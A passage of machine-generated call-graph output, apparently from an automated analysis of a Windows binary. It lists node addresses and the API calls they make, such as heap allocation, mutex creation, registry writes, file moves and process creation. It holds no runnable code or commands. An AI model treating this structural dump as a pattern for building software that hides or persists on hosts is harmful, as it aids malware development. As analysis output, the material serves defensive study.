c7d98 12936->12937 12938 c8279 5 API calls 12937->12938 12939 c7da3 12938->12939 12940 c821d strncpy 12939->12940 12941 c7dae 12940->12941 12942 c8279 5 API calls 12941->12942 12943 c7db9 12942->12943 12944 c821d strncpy 12943->12944 12945 c7dc4 12944->12945 12946 c8279 5 API calls 12945->12946 12947 c7dcf 12946->12947 12948 c821d strncpy 12947->12948 12949 c7dda 12948->12949 12950 c8279 5 API calls 12949->12950 13006 c828a WideCharToMultiByte 13005->13006 13011 c7c27 13005->13011 13007 c82a4 13006->13007 13006->13011 13016 c8604 RtlAllocateHeap 13007->13016 13009 c82ae 13010 c82b8 WideCharToMultiByte 13009->13010 13009->13011 13012 c82df 13010->13012 13013 c82d1 13010->13013 13011->12884 13015 c861a 2 API calls 13012->13015 13014 c861a 2 API calls 13013->13014 13014->13011 13015->13011 13016->13009 13018 c90cf 13017->13018 13018->13018 13019 d242d _ftol2_sse 13018->13019 13020 c9119 13019->13020 13021 c74cc 13020->13021 13022 d242d _ftol2_sse 13020->13022 13021->12376 13022->13020 13024 cffa0 7 API calls 13023->13024 13025 c78ef 13024->13025 13026 c821d strncpy 13025->13026 13027 c7905 13026->13027 13028 c821d strncpy 13027->13028 13029 c791a 13028->13029 13030 c821d strncpy 13029->13030 13031 c792e 13030->13031 13032 c821d strncpy 13031->13032 13033 c7943 13032->13033 13034 c821d strncpy 13033->13034 13035 c7954 13034->13035 13036 c821d strncpy 13035->13036 13037 c796d 13036->13037 13038 c821d strncpy 13037->13038 13039 c7983 13038->13039 13040 c821d strncpy 13039->13040 13041 c7994 13040->13041 13042 c821d strncpy 13041->13042 13043 c79a8 13042->13043 13044 c821d strncpy 13043->13044 13045 c79bb 13044->13045 13046 c821d strncpy 13045->13046 13047 c79cf 13046->13047 13048 c821d strncpy 13047->13048 13049 c79ee 13048->13049 13050 c8279 5 API calls 13049->13050 13051 c79ff 13050->13051 13052 c821d strncpy 13051->13052 13053 c7a0a 13052->13053 13054 c8279 5 API calls 13053->13054 13055 c7a1b 13054->13055 13056 c821d strncpy 13055->13056 13057 c7a26 13056->13057 13058 c821d strncpy 13057->13058 13059 c7a42 13058->13059 13060 d0a21 12 API calls 13059->13060 13061 c7a4a 13060->13061 13061->12380 13063 d0b0e 18 API calls 13062->13063 13064 c7320 13063->13064 13065 c96ca memset 13064->13065 13068 c732c 13064->13068 13066 c7360 13065->13066 13066->13068 13115 c8604 RtlAllocateHeap 13066->13115 13068->12391 13069 c7458 13070 c861a 2 API calls 13069->13070 13072 c7469 13069->13072 13070->13069 13071 c7404 13071->13068 13071->13069 13073 c91a6 RtlAllocateHeap 13071->13073 13074 c861a 2 API calls 13072->13074 13073->13071 13074->13068 13076 c71c8 13075->13076 13077 cb4a3 2 API calls 13076->13077 13085 c725e 13076->13085 13078 c71e4 13077->13078 13078->13085 13088 c7233 13078->13088 13116 c8604 RtlAllocateHeap 13078->13116 13080 c861a 2 API calls 13082 c7254 13080->13082 13081 c7201 13084 c9601 2 API calls 13081->13084 13081->13088 13083 c861a 2 API calls 13082->13083 13083->13085 13086 c7220 13084->13086 13085->12401 13089 c118e 13085->13089 13117 c82fe 13086->13117 13088->13080 13090 c110b 9 API calls 13089->13090 13091 c119f 13090->13091 13092 c11b0 memset 13091->13092 13093 c11ac 13091->13093 13094 c1da0 66 API calls 13092->13094 13093->12395 13095 c11d2 13094->13095 13095->12395 13097 cffa0 7 API calls 13096->13097 13098 c7a6c 13097->13098 13099 c821d strncpy 13098->13099 13100 c7a82 13099->13100 13101 c821d strncpy 13100->13101 13102 c7a96 13101->13102 13103 c821d strncpy 13102->13103 13104 c7aa7 13103->13104 13105 c821d strncpy 13104->13105 13106 c7ab8 13105->13106 13107 c821d strncpy 13106->13107 13108 c7acd 13107->13108 13109 c821d strncpy 13108->13109 13110 c7ae3 13109->13110 13111 c821d strncpy 13110->13111 13112 c7af9 13111->13112 13113 d0a21 12 API calls 13112->13113 13114 c7b01 13113->13114 13114->12397 13115->13071 13116->13081 13124 c8604 RtlAllocateHeap 13117->13124 13119 c832a 13120 c8380 GetLastError 13119->13120 13122 c849e 13119->13122 13123 c840a 13119->13123 13120->13123 13121 c861a 2 API calls 13121->13122 13122->13088 13123->13121 13124->13119 13637 c229a 13638 c22ab 13637->13638 13639 c22c3 13637->13639 13640 c9749 2 API calls 13638->13640 13674 c2255 13639->13674 13643 c22b8 13640->13643 13647 c6aed 13643->13647 13644 c94b7 2 API calls 13646 c22dc 13644->13646 13648 c6b0f 13647->13648 13664 c6b07 13647->13664 13649 cb4a3 2 API calls 13648->13649 13650 c6b18 13649->13650 13650->13664 13681 cfccd 13650->13681 13652 c6b32 13654 c861a 2 API calls 13652->13654 13653 c6b2c 13653->13652 13655 c914f 5 API calls 13653->13655 13654->13664 13656 c6b65 13655->13656 13657 c60df 4 API calls 13656->13657 13656->13664 13658 c6b77 13657->13658 13659 c6b9c 13658->13659 13660 c6b84 13658->13660 13662 ca77d 3 API calls 13659->13662 13661 c861a 2 API calls 13660->13661 13661->13664 13663 c6baa 13662->13663 13665 c5886 8 API calls 13663->13665 13673 c6bbc 13663->13673 13664->13639 13666 c6bb8 13665->13666 13668 c9749 2 API calls 13666->13668 13666->13673 13667 c861a 2 API calls 13669 c6bf0 13667->13669 13670 c6bc9 13668->13670 13671 c861a 2 API calls 13669->13671 13672 c9f06 6 API calls 13670->13672 13671->13652 13672->13673 13673->13667 13675 cb4a3 2 API calls 13674->13675 13676 c2266 13675->13676 13677 ca0ab 6 API calls 13676->13677 13679 c2287 13676->13679 13680 c2296 13676->13680 13677->13679 13678 c861a 2 API calls 13678->13680 13679->13678 13680->13644 13682 cfcdc 13681->13682 13683 cfd18 13681->13683 13684 c861a 2 API calls 13682->13684 13689 c8604 RtlAllocateHeap 13683->13689 13686 cfce5 13684->13686 13687 c8669 RtlAllocateHeap 13686->13687 13688 cfcfc 13686->13688 13687->13688 13688->13653 13689->13686 13690 cf69b 13693 c8604 RtlAllocateHeap 13690->13693 13692 cf6ab 13693->13692 13233 c2027 13234 c2064 13233->13234 13235 c2057 13233->13235 13236 c902d _ftol2_sse 13234->13236 13239 c206e 13234->13239 13263 c933a 13235->13263 13238 c2093 13236->13238 13240 cb4a3 2 API calls 13238->13240 13241 c20ab 13240->13241 13242 c20b2 13241->13242 13243 c9256 2 API calls 13241->13243 13244 c861a 2 API calls 13242->13244 13245 c20c1 13243->13245 13246 c2200 13244->13246 13270 cb27d memset 13245->13270 13248 c861a 2 API calls 13246->13248 13249 c220b 13248->13249 13250 c861a 2 API calls 13249->13250 13258 c2217 13250->13258 13251 c223f 13253 c94b7 2 API calls 13251->13253 13252 c92e5 RtlAllocateHeap lstrcatW 13262 c20cc 13252->13262 13253->13239 13254 c2234 13256 c861a 2 API calls 13254->13256 13255 c861a 2 API calls 13255->13258 13256->13251 13257 ca77d 3 API calls 13257->13262 13258->13251 13258->13254 13258->13255 13259 c861a HeapFree memset 13259->13262 13260 c91e3 RtlAllocateHeap 13260->13262 13261 ca911 memset CreateProcessW GetExitCodeProcess 13261->13262 13262->13242 13262->13252 13262->13257 13262->13259 13262->13260 13262->13261 13266 c9351 13263->13266 13265 c93b7 13265->13234 13285 c8604 RtlAllocateHeap 13266->13285 13267 c9392 lstrcatA 13268 c93a6 lstrcatA 13267->13268 13269 c9387 13267->13269 13268->13269 13269->13265 13269->13267 13286 c8604 RtlAllocateHeap 13270->13286 13272 cb2a4 13273 c91e3 RtlAllocateHeap 13272->13273 13284 cb328 13272->13284 13274 cb2c2 13273->13274 13275 c91e3 RtlAllocateHeap 13274->13275 13276 cb2d5 13275->13276 13277 c91e3 RtlAllocateHeap 13276->13277 13278 cb2e9 13277->13278 13279 c95e1 RtlAllocateHeap 13278->13279 13280 cb2f6 13279->13280 13281 c85d5 2 API calls 13280->13281 13282 cb31c 13281->13282 13283 c91e3 RtlAllocateHeap 13282->13283 13283->13284 13284->13262 13285->13269 13286->13272 13396 c5431 13397 c950e 3 API calls 13396->13397 13398 c5449 13397->13398 13418 c5531 13398->13418 13419 c8604 RtlAllocateHeap 13398->13419 13400 c5460 13401 c95c7 RtlAllocateHeap 13400->13401 13400->13418 13402 c5478 13401->13402 13403 c9601 2 API calls 13402->13403 13404 c548d 13403->13404 13405 c85c2 2 API calls 13404->13405 13406 c5495 13405->13406 13407 ca77d 3 API calls 13406->13407 13408 c54a3 13407->13408 13409 c861a 2 API calls 13408->13409 13410 c54b0 13409->13410 13411 ca911 3 API calls 13410->13411 13415 c54bd 13411->13415 13412 cb1b1 13 API calls 13417 c54e8 13412->13417 13414 c5526 13416 c861a 2 API calls 13414->13416 13415->13417 13420 ca63b CreateFileW 13415->13420 13416->13418 13417->13412 13417->13414 13419->13400 13420->13415 13466 c2454 13467 c2509 13466->13467 13468 c246a 13466->13468 13470 c94b7 2 API calls 13467->13470 13469 cb4a3 2 API calls 13468->13469 13472 c2477 13469->13472 13471 c2516 13470->13471 13488 c9569 13472->13488 13475 c9256 2 API calls 13476 c2485 13475->13476 13476->13467 13477 c109a RtlAllocateHeap 13476->13477 13478 c2498 13477->13478 13479 c92e5 2 API calls 13478->13479 13480 c24b0 13479->13480 13481 c85d5 2 API calls 13480->13481 13482 c24be 13481->13482 13483 c24fa 13482->13483 13484 ca911 3 API calls 13482->13484 13485 c861a 2 API calls 13483->13485 13486 c24dd 13484->13486 13485->13467 13487 c861a 2 API calls 13486->13487 13487->13483 13489 c9572 13488->13489 13491 c247e 13488->13491 13492 c8604 RtlAllocateHeap 13489->13492 13491->13475 13492->13491 9947 c5cec 9964 d249b 9947->9964 9951 c5d08 9970 c8f78 9951->9970 9963 c5d6c 9965 d24b3 GetModuleHandleA 9964->9965 9967 c5d03 9964->9967 9968 d24ce 9965->9968 9966 d2547 LoadLibraryA 9966->9967 9966->9968 9969 c85ef HeapCreate 9967->9969 9968->9966 9968->9967 9969->9951 10031 c8604 RtlAllocateHeap 9970->10031 9972 c5d0d 9973 c5eb6 9972->9973 10032 ce1bc 9973->10032 9976 ce1bc 7 API calls 9977 c5ee3 9976->9977 9978 ce1bc 7 API calls 9977->9978 9979 c5efc 9978->9979 9980 ce1bc 7 API calls 9979->9980 9981 c5f15 9980->9981 9982 ce1bc 7 API calls 9981->9982 9983 c5f30 9982->9983 9984 ce1bc 7 API calls 9983->9984 9985 c5f49 9984->9985 9986 ce1bc 7 API calls 9985->9986 9987 c5f62 9986->9987 9988 ce1bc 7 API calls 9987->9988 9989 c5d26 9988->9989 9990 ccf84 GetCurrentProcess 9989->9990 10074 cba05 9990->10074 9992 ccf9d GetModuleFileNameW 9993 ccfbb 9992->9993 9994 ccfd3 memset GetVersionExA GetCurrentProcessId 9993->9994 10081 ce3b6 9994->10081 9996 cd004 10086 ce3f1 9996->10086 9999 ca86d 10000 ca886 9999->10000 10105 ca7bc 10000->10105 10003 cb337 10005 cb34a 10003->10005 10004 c5d58 memset 10007 c5c26 10004->10007 10005->10004 10006 cb363 CloseHandle 10005->10006 10006->10004 10125 c9b43 10007->10125 10010 c5c51 10010->9963 10011 c5c69 10179 c5d7d 10011->10179 10015 c5c78 10018 c5c7d 10015->10018 10019 c5ccc 10015->10019 10016 c5cc7 10212 c5aff 10016->10212 10020 c5ce8 10018->10020 10023 ca86d 5 API calls 10018->10023 10019->10020 10030 c5cc5 10019->10030 10225 cf8cc 10019->10225 10020->9963 10024 c5c9d 10023->10024 10025 cb337 CloseHandle 10024->10025 10026 c5ca5 10025->10026 10188 c5974 10026->10188 10246 c5a61 RtlAddVectoredExceptionHandler 10030->10246 10031->9972 10042 c95c7 10032->10042 10035 ce1de GetModuleHandleA 10037 ce1ed 10035->10037 10036 ce1e6 LoadLibraryA 10036->10037 10038 ce1fb 10037->10038 10045 ce171 10037->10045 10050 c85c2 10038->10050 10054 c84ab 10042->10054 10059 c8604 RtlAllocateHeap 10045->10059 10047 ce183 10048 ce1b2 10047->10048 10060 cdfad 10047->10060 10048->10038 10051 c85ca 10050->10051 10052 c5eca 10050->10052 10066 c861a 10051->10066 10052->9976 10055 c84c1 10054->10055 10057 c84e2 10054->10057 10055->10057 10058 c8604 RtlAllocateHeap 10055->10058 10057->10035 10057->10036 10058->10057 10059->10047 10061 ce021 10060->10061 10062 cdfc6 10060->10062 10061->10047 10062->10061 10063 ce079 LoadLibraryA 10062->10063 10063->10061 10064 ce087 GetProcAddress 10063->10064 10064->10061 10065 ce093 10064->10065 10065->10061 10067 c8666 10066->10067 10068 c8624 10066->10068 10067->10052 10068->10067 10071 c874f 10068->10071 10072 c8758 memset 10071->10072 10073 c8654 HeapFree 10071->10073 10072->10073 10073->10067 10075 cba1d 10074->10075 10076 cba21 10075->10076 10090 cb998 GetTokenInformation 10075->10090 10076->9992 10079 cba52 CloseHandle 10080 cba3e 10079->10080 10080->9992 10082 ce3cd 10081->10082 10083 ce3ed 10082->10083 10100 c91e3 10082->10100 10083->9996 10085 ce3da 10085->9996 10088 ce410 10086->10088 10087 c5d2b 10087->9999 10088->10087 10089 c91e3 RtlAllocateHeap 10088->10089 10089->10087 10091 cb9ba GetLastError 10090->10091 10092 cb9d7 10090->10092 10091->10092 10093 cb9c5 10091->10093 10092->10079 10092->10080 10099 c8604 RtlAllocateHeap 10093->10099 10095 cb9cd 10095->10092 10096 cb9db GetTokenInformation 10095->10096 10096->10092 10097 cb9f0 10096->10097 10098 c861a 2 API calls 10097->10098 10098->10092 10099->10095 10101 c91ec 10100->10101 10103 c91fe 10100->10103 10104 c8604 RtlAllocateHeap 10101->10104 10103->10085 10104->10103 10114 d22d3 10105->10114 10107 ca7d4 10108 c95c7 RtlAllocateHeap 10107->10108 10109 ca7fe 10108->10109 10118 c9601 10109->10118 10111 ca85c 10112 c85c2 2 API calls 10111->10112 10113 c5d50 10112->10113 10113->10003 10115 d22fd 10114->10115 10116 d22de 10114->10116 10115->10107 10116->10115 10122 d242d 10116->10122 10119 c874f memset 10118->10119 10120 c9615 _vsnprintf 10119->10120 10121 c962f 10120->10121 10121->10111 10123 d243c 10122->10123 10124 d2480 _ftol2_sse 10123->10124 10124->10116 10249 c8604 RtlAllocateHeap 10125->10249 10127 c9b6d 10128 c5c45 10127->10128 10250 cb5f6 10127->10250 10128->10010 10128->10011 10168 cfb19 10128->10168 10131 c95c7 RtlAllocateHeap 10132 c9bb0 10131->10132 10133 c9ceb 10132->10133 10137 c9bdc 10132->10137 10134 c9d3c 10133->10134 10135 c9cfd 10133->10135 10136 c9292 2 API calls 10134->10136 10138 c9292 2 API calls 10135->10138 10163 c9ce7 10135->10163 10136->10163 10137->10163 10260 c9292 10137->10260 10138->10163 10139 c85c2 2 API calls 10140 c9d5c RegOpenKeyExA 10139->10140 10141 c9db2 RegCloseKey 10140->10141 10142 c9d76 RegCreateKeyA 10140->10142 10147 c9def 10141->10147 10142->10141 10144 c9d8d 10142->10144 10146 c861a 2 API calls 10144->10146 10148 c9d9b memset 10146->10148 10153 c861a 2 API calls 10147->10153 10149 c861a 2 API calls 10148->10149 10149->10141 10151 c9ca1 10156 c9292 2 API calls 10151->10156 10153->10128 10158 c9cc8 10156->10158 10162 c861a 2 API calls 10158->10162 10162->10163 10163->10139 10164 c861a 2 API calls 10166 c9c96 10164->10166 10167 c861a 2 API calls 10166->10167 10167->10151 10293 c8604 RtlAllocateHeap 10168->10293 10170 cfb20 10171 cfb2a 10170->10171 10294 ca6a9 10170->10294 10171->10011 10174 cfb6e 10174->10011 10176 cfb55 10177 cf8cc 25 API calls 10176->10177 10178 cfb6b 10177->10178 10178->10011 10180 ca86d 5 API calls 10179->10180 10181 c5d9a 10180->10181 10182 c5974 9 API calls 10181->10182 10184 c5c6e 10181->10184 10183 c5dd4 10182->10183 10183->10184 10350 c9ebb 10183->10350 10184->10015 10184->10016 10187 c5de6 lstrcmpiW 10187->10184 10189 ca86d 5 API calls 10188->10189 10190 c598d 10189->10190 10191 c599a 10190->10191 10192 c9292 2 API calls 10190->10192 10193 c59bd 10192->10193 10383 c590c 10193->10383 10195 c59cd 10196 c59f1 10195->10196 10199 c590c 3 API calls 10195->10199 10197 c861a 2 API calls 10196->10197 10198 c59fd 10197->10198 10200 c5bc4 10198->10200 10199->10196 10201 c9ebb 7 API calls 10200->10201 10202 c5bce 10201->10202 10203 c5bdc lstrcmpiW 10202->10203 10204 c5bd7 10202->10204 10205 c5c14 10203->10205 10206 c5bf2 10203->10206 10204->10030 10208 c861a 2 API calls 10205->10208 10388 c9f6c 10206->10388 10208->10204 10210 c5c0d 10392 cb1b1 SetFileAttributesW memset 10210->10392 10439 c8604 RtlAllocateHeap 10212->10439 10214 c5b11 10215 c5b24 GetDriveTypeW 10214->10215 10216 c5b55 10214->10216 10215->10216 10440 c5a7b 10216->10440 10218 c5b71 10219 c5ba1 10218->10219 10457 c4d6d 10218->10457 10548 ca39e 10219->10548 10223 ca39e 2 API calls 10224 c5bbd 10223->10224 10224->10019 10226 c109a RtlAllocateHeap 10225->10226 10227 cf8db 10226->10227 11115 c61b4 memset 10227->11115 10230 c85d5 2 API calls 10231 cf901 10230->10231 10245 cf978 10231->10245 11132 c9e66 10231->11132 10235 cf92c 10236 c109a RtlAllocateHeap 10235->10236 10235->10245 10237 cf93e 10236->10237 10238 c9640 2 API calls 10237->10238 10239 cf94d 10238->10239 10240 ca911 3 API calls 10239->10240 10241 cf95e 10240->10241 10244 cf96c 10241->10244 11138 ca239 10241->11138 10243 c861a 2 API calls 10243->10245 10244->10243 10245->10030 11146 c5631 10246->11146 10249->10127 10251 cb60f 10250->10251 10252 d242d _ftol2_sse 10251->10252 10253 cb61f 10252->10253 10254 c95c7 RtlAllocateHeap 10253->10254 10256 cb62e 10254->10256 10255 cb66a 10257 c85c2 2 API calls 10255->10257 10256->10255 10258 d242d _ftol2_sse 10256->10258 10259 c9b91 10257->10259 10258->10256 10259->10131 10261 c92a4 10260->10261 10285 c8604 RtlAllocateHeap 10261->10285 10263 c92de 10263->10144 10263->10151 10266 c95e1 10263->10266 10264 c92c1 10264->10263 10265 c92cd lstrcatA 10264->10265 10265->10264 10286 c8531 10266->10286 10268 c95fc 10269 c92e5 10268->10269 10270 c92f7 10269->10270 10291 c8604 RtlAllocateHeap 10270->10291 10272 c9316 10273 c9333 10272->10273 10274 c9322 lstrcatW 10272->10274 10275 c85d5 10273->10275 10274->10272 10276 c85eb 10275->10276 10277 c85e3 10275->10277 10279 c9256 10276->10279 10278 c861a 2 API calls 10277->10278 10278->10276 10280 c928c 10279->10280 10281 c925f 10279->10281 10280->10164 10292 c8604 RtlAllocateHeap 10281->10292 10283 c9271 10283->10280 10284 c9279 MultiByteToWideChar 10283->10284 10284->10280 10285->10264 10288 c854d 10286->10288 10290 c8604 RtlAllocateHeap 10288->10290 10289 c8581 10289->10268 10289->10289 10290->10289 10291->10272 10292->10283 10293->10170 10295 ca6c2 10294->10295 10297 ca6bb 10294->10297 10331 ca63b CreateFileW 10295->10331 10297->10174 10307 cf9bf 10297->10307 10298 ca6c9 10298->10297 10299 ca73d 10298->10299 10332 c8604 RtlAllocateHeap 10298->10332 10299->10297 10301 c861a 2 API calls 10299->10301 10301->10297 10302 ca72d ReadFile 10302->10299 10303 ca6f0 10302->10303 10303->10299 10303->10302 10304 ca75e 10303->10304 10304->10299 10305 ca763 CloseHandle 10304->10305 10305->10297 10333 c8604 RtlAllocateHeap 10307->10333 10309 cfb10 10309->10176 10310 cf9d2 10310->10309 10313 cfabc 10310->10313 10334 c109a 10310->10334 10315 cfae5 Sleep 10313->10315 10316 cfb06 10313->10316 10337 ca77d 10313->10337 10315->10313 10315->10316 10317 c861a 2 API calls 10316->10317 10317->10309 10318 c95e1 RtlAllocateHeap 10319 cfa2c 10318->10319 10320 c92e5 2 API calls 10319->10320 10321 cfa49 10320->10321 10322 ca6a9 6 API calls 10321->10322 10323 cfa56 10322->10323 10324 c85d5 2 API calls 10323->10324 10325 cfa62 10324->10325 10326 c85d5 2 API calls 10325->10326 10328 cfa6b 10326->10328 10327 c861a 2 API calls 10329 cfab1 10327->10329 10328->10327 10330 c861a 2 API calls 10329->10330 10330->10313 10331->10298 10332->10303 10333->10310 10335 c8531 RtlAllocateHeap 10334->10335 10336 c10b5 10335->10336 10336->10318 10344 ca5f7 CreateFileW 10337->10344 10340 ca792 10340->10313 10343 ca7ae CloseHandle 10343->10340 10345 ca61c 10344->10345 10345->10340 10346 ca65c 10345->10346 10347 ca69e 10346->10347 10348 ca66f WriteFile 10346->10348 10347->10340 10347->10343 10348->10347 10349 ca693 10348->10349 10349->10347 10349->10348 10353 c9f95 10350->10353 10354 c9fbe 10353->10354 10365 c9b0e 10354->10365 10356 c5de2 10356->10184 10356->10187 10357 c9fc9 10357->10356 10368 cbe9b RegOpenKeyExA 10357->10368 10359 ca095 10360 c861a 2 API calls 10359->10360 10360->10356 10361 ca070 10363 c861a 2 API calls 10361->10363 10362 c9ffd 10362->10359 10362->10361 10377 c8669 10362->10377 10363->10359 10380 c8604 RtlAllocateHeap 10365->10380 10367 c9b1a 10367->10357 10369 cbec9 RegQueryValueExA 10368->10369 10373 cbec5 10368->10373 10370 cbee8 10369->10370 10376 cbf15 10369->10376 10381 c8604 RtlAllocateHeap 10370->10381 10372 cbf26 RegCloseKey 10372->10373 10373->10362 10374 cbef2 10375 cbef9 RegQueryValueExA 10374->10375 10374->10376 10375->10376 10376->10372 10376->10373 10382 c8604 RtlAllocateHeap 10377->10382 10379 c867a 10379->10361 10380->10367 10381->10374 10382->10379 10384 c591c CreateMutexA 10383->10384 10387 c5917 10383->10387 10385 c593f GetLastError 10384->10385 10386 c5934 GetLastError 10384->10386 10385->10387 10386->10387 10387->10195 10389 c9f7c 10388->10389 10405 ca0ab 10389->10405 10393 ca77d 3 API calls 10392->10393 10394 cb1ec 10393->10394 10395 d242d _ftol2_sse 10394->10395 10401 cb1ff 10394->10401 10396 cb21b 10395->10396 10423 c9640 10396->10423 10399 c92e5 2 API calls 10400 cb23d 10399->10400 10400->10401 10427 cb0de 10400->10427 10401->10205 10404 c861a 2 API calls 10404->10401 10406 ca0c8 10405->10406 10417 c5c08 10405->10417 10407 d242d _ftol2_sse 10406->10407 10406->10417 10408 ca112 10407->10408 10422 c8604 RtlAllocateHeap 10408->10422 10410 ca126 10411 d22d3 _ftol2_sse 10410->10411 10410->10417 10412 ca168 10411->10412 10413 c9b0e RtlAllocateHeap 10412->10413 10416 ca1b4 10413->10416 10414 ca21e 10415 c861a 2 API calls 10414->10415 10415->10417 10416->10414 10418 ca1c8 RegOpenKeyExA 10416->10418 10417->10205 10417->10210 10419 ca1ea RegSetValueExA 10418->10419 10420 ca1e5 10418->10420 10419->10420 10421 c861a 2 API calls 10420->10421 10421->10414 10422->10410 10424 c874f memset 10423->10424 10425 c9654 _vsnwprintf 10424->10425 10426 c9671 10425->10426 10426->10399 10428 cb101 10427->10428 10429 cb109 memset 10428->10429 10438 cb178 10428->10438 10430 c95e1 RtlAllocateHeap 10429->10430 10431 cb125 10430->10431 10432 d242d _ftol2_sse 10431->10432 10433 cb141 10432->10433 10434 c9640 2 API calls 10433->10434 10435 cb157 10434->10435 10436 c85d5 2 API calls 10435->10436 10437 cb160 MoveFileW 10436->10437 10437->10438 10438->10404 10439->10214 10556 c1080 10440->10556 10445 c85c2 2 API calls 10446 c5ab7 10445->10446 10447 c1080 RtlAllocateHeap 10446->10447 10456 c5af7 10446->10456 10448 c5ac5 10447->10448 10565 c8910 10448->10565 10451 c5ae1 10453 c85c2 2 API calls 10451->10453 10454 c5aeb 10453->10454 10455 c861a 2 API calls 10454->10455 10455->10456 10456->10218 10458 c4dee 10457->10458 10459 c4d91 10457->10459 10665 cb7a8 memset GetComputerNameW lstrcpynW 10458->10665 10461 c95c7 RtlAllocateHeap 10459->10461 10463 c4d9b 10461->10463 10462 c4dfc 10464 ca86d 5 API calls 10462->10464 10465 c95c7 RtlAllocateHeap 10463->10465 10466 c4e08 10464->10466 10467 c4dab 10465->10467 10675 ca471 CreateMutexA 10466->10675 10467->10458 10469 c4db9 GetModuleHandleA 10467->10469 10471 c4dcd 10469->10471 10472 c4dc6 GetModuleHandleA 10469->10472 10470 c4e14 10473 ce1bc 7 API calls 10470->10473 10517 c4e1d 10470->10517 10475 c85c2 2 API calls 10471->10475 10472->10471 10474 c4e37 10473->10474 10476 c95e1 RtlAllocateHeap 10474->10476 10477 c4dde 10475->10477 10478 c4e48 10476->10478 10479 c85c2 2 API calls 10477->10479 10480 c92e5 2 API calls 10478->10480 10481 c4de7 10479->10481 10482 c4e60 10480->10482 10481->10458 10481->10517 10483 c85d5 2 API calls 10482->10483 10484 c4e73 10483->10484 10679 cb269 GetFileAttributesW 10484->10679 10486 c4e7b 10487 c4e9c 10486->10487 10785 c896f 10486->10785 10488 c861a 2 API calls 10487->10488 10490 c4ead 10488->10490 10680 c4a0b memset 10490->10680 10491 c4e8f 10491->10487 10494 ca2e3 8 API calls 10491->10494 10494->10487 10495 c51f1 10497 c95e1 RtlAllocateHeap 10495->10497 10499 c51fd 10497->10499 10500 c92e5 2 API calls 10499->10500 10501 c5215 10500->10501 10502 c5245 10501->10502 10806 cb269 GetFileAttributesW 10501->10806 10505 c85d5 2 API calls 10502->10505 10503 ce2c6 64 API calls 10507 c4f64 10503->10507 10508 c5251 lstrcpynW lstrcpynW 10505->10508 10506 c5229 10511 c861a 2 API calls 10506->10511 10507->10495 10509 c4fb3 10507->10509 10514 c5082 10507->10514 10510 c5296 10508->10510 10509->10495 10516 c4fbc 10509->10516 10512 c861a 2 API calls 10510->10512 10511->10502 10513 c52a8 10512->10513 10515 c861a 2 API calls 10513->10515 10514->10495 10750 cfc1f 10514->10750 10515->10517 10805 c8604 RtlAllocateHeap 10516->10805 10517->10219 10520 c5006 10520->10517 10522 c95e1 RtlAllocateHeap 10520->10522 10524 c501f 10522->10524 10526 c9640 2 API calls 10524->10526 10525 c5110 10525->10495 10528 c109a RtlAllocateHeap 10525->10528 10527 c5052 10526->10527 10529 c85d5 2 API calls 10527->10529 10530 c5129 10528->10530 10531 c505c 10529->10531 10763 c902d 10530->10763 10533 ca911 3 API calls 10531->10533 10549 ca3ad 10548->10549 10555 c5bb5 10548->10555 10550 c861a 2 API calls 10549->10550 10553 ca3d2 10549->10553 10550->10549 10551 c861a 2 API calls 10552 ca3dd 10551->10552 10554 c861a 2 API calls 10552->10554 10553->10551 10554->10555 10555->10223 10557 c84ab RtlAllocateHeap 10556->10557 10558 c1096 10557->10558 10559 ca51a 10558->10559 10560 ca538 10559->10560 10561 d242d _ftol2_sse 10560->10561 10562 ca580 10560->10562 10564 c5aa7 10560->10564 10561->10560 10563 c8669 RtlAllocateHeap 10562->10563 10562->10564 10563->10564 10564->10445 10566 c891f 10565->10566 10572 c5ad4 10565->10572 10584 c8604 RtlAllocateHeap 10566->10584 10568 c8929 10568->10572 10585 c8815 10568->10585 10571 c861a 2 API calls 10571->10572 10572->10451 10573 ca2e3 10572->10573 10620 c8a90 10573->10620 10577 ca397 10577->10451 10578 ca38f 10635 c8cc0 10578->10635 10581 ca2fd 10581->10577 10581->10578 10582 c8698 3 API calls 10581->10582 10626 c9749 10581->10626 10631 c91a6 10581->10631 10582->10581 10584->10568 10595 c8604 RtlAllocateHeap 10585->10595 10587 c88d6 10588 c861a 2 API calls 10587->10588 10590 c8837 10587->10590 10588->10590 10589 c882a 10589->10587 10589->10590 10596 cebf0 10589->10596 10590->10571 10590->10572 10593 c88f0 10594 c861a 2 API calls 10593->10594 10594->10590 10595->10589 10611 c8604 RtlAllocateHeap 10596->10611 10598 cec14 10608 ced7f 10598->10608 10612 c8604 RtlAllocateHeap 10598->10612 10600 cec2c 10600->10608 10613 c8604 RtlAllocateHeap 10600->10613 10601 c861a 2 API calls 10602 ceda5 10601->10602 10603 c861a 2 API calls 10602->10603 10605 cedb3 10603->10605 10606 c88cf 10605->10606 10607 c861a 2 API calls 10605->10607 10606->10587 10606->10593 10607->10606 10608->10601 10609 cec42 10609->10608 10614 c8698 10609->10614 10611->10598 10612->10600 10613->10609 10619 c8604 RtlAllocateHeap 10614->10619 10616 c86ad 10617 c861a 2 API calls 10616->10617 10618 c86d5 10616->10618 10617->10618 10618->10609 10619->10616 10623 c8ab3 10620->10623 10621 c8604 RtlAllocateHeap 10621->10623 10622 c8be7 10625 c8604 RtlAllocateHeap 10622->10625 10623->10621 10623->10622 10624 c861a 2 API calls 10623->10624 10624->10623 10625->10581 10627 c974b 10626->10627 10628 c978c SetLastError 10627->10628 10629 c9780 SetLastError 10627->10629 10630 c9799 10628->10630 10629->10630 10630->10581 10632 c91b1 10631->10632 10634 c91c7 10631->10634 10647 c8604 RtlAllocateHeap 10632->10647 10634->10581 10637 c8ccf 10635->10637 10646 c8d57 10635->10646 10636 c8d09 10640 c8d19 10636->10640 10648 c8de5 10636->10648 10637->10636 10638 c861a 2 API calls 10637->10638 10637->10646 10638->10637 10641 c861a 2 API calls 10640->10641 10643 c8d34 10640->10643 10641->10643 10642 c8d4a 10644 c861a 2 API calls 10642->10644 10643->10642 10645 c861a 2 API calls 10643->10645 10644->10646 10645->10642 10646->10577 10647->10634 10659 c8604 RtlAllocateHeap 10648->10659 10650 c8e28 10650->10640 10651 c8e1e 10651->10650 10653 c8e61 10651->10653 10660 c879d 10651->10660 10654 ca5f7 CreateFileW 10653->10654 10655 c8f39 10654->10655 10656 ca65c WriteFile 10655->10656 10657 c8f40 10655->10657 10656->10657 10658 c861a 2 API calls 10657->10658 10658->10650 10659->10651 10661 d242d _ftol2_sse 10660->10661 10662 c87b6 10661->10662 10663 c87e3 10662->10663 10664 d242d _ftol2_sse 10662->10664 10663->10653 10664->10662 10666 c95e1 RtlAllocateHeap 10665->10666 10667 cb7ff GetVolumeInformationW 